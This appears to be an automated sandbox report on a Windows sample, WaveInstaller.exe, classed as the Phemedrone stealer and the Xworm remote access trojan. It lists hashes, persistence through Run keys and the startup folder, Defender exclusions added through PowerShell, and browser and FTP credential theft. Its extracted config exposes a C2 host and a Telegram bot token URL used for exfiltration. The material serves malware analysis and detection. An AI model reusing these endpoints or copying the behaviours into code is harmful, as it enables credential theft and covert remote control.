phemedrone | 6ac30aaef20c25564eebdbfd55db25f61ff6c84204ecc30241c0cf2332a0d04b

Analysis

max time kernel
106s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25-08-2024 12:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

WaveInstaller.exe
Size

2.3MB
MD5

f80723c7062d0414bfd23249a943b330
SHA1

0996049a3da01ef925e954867aaa302d82279639
SHA256

6ac30aaef20c25564eebdbfd55db25f61ff6c84204ecc30241c0cf2332a0d04b
SHA512

f99821c40a3c1d19403b7cd21a2434293d2d23c92a716312e4bbbfb433b1c4b2ec4c90ce9750d4b574d0a802108191621a3b018ab2ebff65f535d843929278de
SSDEEP

49152:XJAFOSG/TBqwnbetRXZRAL3Wa88eVuN6yCQhJolninbT:ZAo3/T5bQRpRAL3denin

Score

10^/10

phemedrone xworm credential_access execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:19121

goods-flex.gl.at.ply.gg:19121

Attributes

Install_directory
%Public%
install_file
calc.exe

Extracted

Family

phemedrone

https://api.telegram.org/bot6766891578:AAE47sIyviQ0_skRFQtvxeYcndg1C8RFyo4/sendDocument

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e000000023378-35.dat	family_xworm
behavioral1/memory/3260-42-0x00000000003F0000-0x0000000000408000-memory.dmp	family_xworm

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1624	powershell.exe
2252	powershell.exe
2944	powershell.exe
3624	powershell.exe
1804	powershell.exe
3052	powershell.exe
4112	powershell.exe
4936	powershell.exe
1472	powershell.exe
4612	powershell.exe
3272	powershell.exe
572	powershell.exe
4520	powershell.exe
4236	powershell.exe
1124	powershell.exe
4176	powershell.exe
2776	powershell.exe
4132	powershell.exe
2704	powershell.exe
1864	powershell.exe
2480	powershell.exe
4668	powershell.exe
2736	powershell.exe
4476	powershell.exe
4664	powershell.exe
5032	powershell.exe
772	powershell.exe
5116	powershell.exe
3088	powershell.exe
3952	powershell.exe
2420	powershell.exe
2008	powershell.exe
5052	powershell.exe
2144	powershell.exe
3772	powershell.exe
1796	powershell.exe
1812	powershell.exe
444	powershell.exe
4584	powershell.exe
4628	powershell.exe
3824	powershell.exe
3624	powershell.exe
1048	powershell.exe
1864	powershell.exe
2472	powershell.exe
1628	powershell.exe
2448	powershell.exe
4896	powershell.exe
1576	powershell.exe
2544	powershell.exe
4700	powershell.exe
4392	powershell.exe
4708	powershell.exe
2016	powershell.exe
2252	powershell.exe
4176	powershell.exe
3816	powershell.exe
3952	powershell.exe
1796	powershell.exe
4444	powershell.exe
2968	powershell.exe
3040	powershell.exe
1264	powershell.exe
2968	powershell.exe

Checks computer location settings 2 TTPs 34 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	calcc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WaveInstaller.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc.lnk	calcc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc.lnk	calcc.exe

Executes dropped EXE 64 IoCs

pid	Process
3260	calcc.exe
3332	Sync Center.exe
4148	calcc.exe
2544	Sync Center.exe
4856	calcc.exe
384	Sync Center.exe
5020	calcc.exe
1860	Sync Center.exe
2308	calcc.exe
2984	Sync Center.exe
2960	calcc.exe
3164	Sync Center.exe
3660	calcc.exe
1144	Sync Center.exe
4344	calcc.exe
3252	Sync Center.exe
3832	calcc.exe
4888	Sync Center.exe
3224	calcc.exe
4676	Sync Center.exe
1064	calcc.exe
3712	Sync Center.exe
5088	calcc.exe
2008	Sync Center.exe
1700	calcc.exe
4836	Sync Center.exe
2364	calcc.exe
3852	Sync Center.exe
3164	calcc.exe
1064	Sync Center.exe
5080	calcc.exe
4316	Sync Center.exe
4664	calcc.exe
4708	Sync Center.exe
2288	calcc.exe
4900	Sync Center.exe
4768	calcc.exe
2064	Sync Center.exe
4392	calcc.exe
2960	Sync Center.exe
3068	calcc.exe
5000	Sync Center.exe
2632	calc.exe
4120	calcc.exe
1716	Sync Center.exe
4808	calcc.exe
3568	Sync Center.exe
3808	calcc.exe
972	Sync Center.exe
4952	calcc.exe
4420	Sync Center.exe
4444	calcc.exe
2016	Sync Center.exe
4532	calcc.exe
788	Sync Center.exe
4420	calcc.exe
4688	Sync Center.exe
4452	calcc.exe
2924	Sync Center.exe
3552	calcc.exe
5020	Sync Center.exe
2448	calcc.exe
3088	Sync Center.exe
4452	calcc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calc = "C:\\Users\\Public\\calc.exe"	calcc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\calcc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\calcc.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sync Center = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sync Center.exe"	WaveInstaller.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com
102	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "126"	LogonUI.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3068	schtasks.exe

